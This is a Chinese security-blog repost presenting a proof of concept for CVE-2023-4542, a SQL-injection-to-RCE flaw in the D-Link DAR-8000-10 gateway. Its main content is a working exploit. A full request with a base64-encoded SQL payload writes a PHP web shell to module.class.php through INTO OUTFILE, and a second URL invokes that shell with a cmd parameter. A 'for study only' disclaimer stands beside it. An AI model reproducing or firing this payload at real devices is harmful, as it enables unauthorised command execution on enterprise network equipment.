CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

admin 2024年9月28日13:39:35评论20 views字数 905阅读3分1秒阅读模式

简介

D-LINK DAR-8000系列上网行为审计网关提供完善的互联网访问行为管理解决方案,全面保护企业的运营效率和信息安全。DAR-8000系列产品提供全面的应用识别和控制能力、精细化的应用层带宽管理能力、分类化的海量URL过滤能力、详尽的上网行为审计能力以及丰富的上网行为报表,从而帮助企业快速构建可视化、低成本以及高效安全的商业网络。

CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

漏洞描述

D-Link DAR-8000-10 中发现漏洞,漏洞编号为 20230809。该漏洞已被列为严重漏洞。这会影响文件 /importhtml.php 的未知部分。使用输入 的sql 参数 造成SQL注入,从而导致文件写入,最后会导致操作系统远程命令执行。

影响版本

DLink-DAR-8000-10

空间测绘

回复“CVE-2023-4542”获取空间测绘搜索语句

漏洞利用

  1. 访问DLink-DAR-8000-10主页面

CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

2.执行payload,不用打开或保存

https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==

CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

3.直接访问shell

https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();

CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-4542https://github.com/PumpkinBridge/cve/blob/main/rce.md

回复“CVE-2023-4542”获取空间测绘搜索语句

仅供学习交流,勿用作违法犯罪

CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

原文始发于微信公众号(不够安全):CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日13:39:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-4542:D-LINK-DAR-8000-10 远程命令执行 附POChttps://cn-sec.com/archives/1983910.html

发表评论

匿名网友 填写信息